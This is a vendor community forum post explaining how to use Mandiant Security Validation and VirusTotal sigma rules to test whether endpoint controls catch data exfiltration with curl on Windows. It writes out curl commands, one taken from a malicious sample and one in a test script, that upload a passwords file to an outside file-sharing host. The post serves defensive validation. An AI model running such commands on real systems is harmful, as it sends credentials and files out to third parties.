This website uses Cookies. Click Accept to agree to our website's cookie use as described in our Privacy Policy. Click Preferences to customize your cookie settings.
Accept
Reject
Preferences
Log in to ask a question
Log in to ask a question

How to use MSV and Virustotal to assess against Data exfiltration using curl

Posted on 05-31-2024 10:30 AM
tameri
Staff
Reply posted on --/--/---- --:-- AM

In this post, I will show you how to use Mandiant Security Validation (MSV) and threat intelligence from Virustotal to validate whether your endpoint security controls can detect data exfiltration using curl on windows.

Your task is to validate whether your endpoint security controls can detect and/or prevent a data exfiltration using curl . The steps will be as follows:

  1. Find the malicious curl use case on virustotal.
  2. Create and run the curl Windows Host CLI action.
  3. Validate the efficacy of the internet security controls and address any gaps.

1-Find the malicious curl use case using virustotal:

I will use sigma rules to find the needed sample,  browse https://www.virustotal.com/ui/sigma_rules and search for curl.exe , you will the get the following entry:

tameri_0-1717173413453.png

Right click on the ID and open in another Tab, where you will get the list of samples matching the sigma rule. You can see that the second sample looks interesting, let’s explore more about that sample

tameri_1-1717173461419.png

 

For “Matches rule Suspicious Curl.EXE Download by Florian Roth (Nextron Systems”) click on “View Matches” and Review the “context for matching events”.

tameri_2-1717173505159.png

 

Quick walk through, apparently curl is being used to upload multiple files, where the first one is file contains passwords, the file name suggest it contains password.

tameri_3-1717173583629.png

Let us use this command for the host cli action

 

CommandLine:curl -F "file=@C:\Users\george\AppData\Local\Temp\cspasswords.txt" https://store8.gofile.io/uploadFile

 

2-Create and run the curl Windows Host CLI action

For the Windows Host CLI action, it will contain the following set of commands:
1-Create fake passwords file and store it in C:\Users\Public folder
2-The Curl command
3-Clean up command

In the MSV Web UI, Click on Library --> Actions --> Add Action --> Host CLI

tameri_4-1717173854275.png

In the First form, do not change anything and click Next

tameri_5-1717173873956.png

In the next form, you select cmd.exe as the shell will run the commands --> paste the commands and hit Validate Syntax.
P.S. I will provide the commands script at the end of the post.

tameri_6-1717173959432.png

Fill form as the following screenshot and then click on Save and Approve Anywhere

tameri_7-1717174019616.png

Go to Library --> Actions -->  Select Host CLI - Data exfiltration using curl and hit run --> Select your endpoint and click on Run Now.

tameri_8-1717174083037.png

 

3-Validate the efficacy of the internet security controls and address any gaps

The status looks great, as you can see the action has been blocked by crowdstrike and Events/logs received by SIEM solutions

 

tameri_9-1717174137783.png

 
 

 

Now you can confidently demonstrate with evidence that your endpoint security controls, along with SIEM integration, can detect and prevent data exfiltration using curl.

Host CLI  Script

 

echo user password > C:\Users\Public\cspasswords.txt
    auto,4,true,60
    success_zero
dir C:\Users\Public\cspasswords.txt
    auto,4,true,60
    success_match:cspasswords.txt
curl.exe -F "file=@C:\Users\Public\cspasswords.txt" https://store8.gofile.io/uploadFile
    auto,4,true,60
    success_match:"status":"ok"
del C:\Users\Public\cspasswords.txt
    auto,3,true,4
    cleanup

 

 

3 0 196
Topic Labels
0 REPLIES 0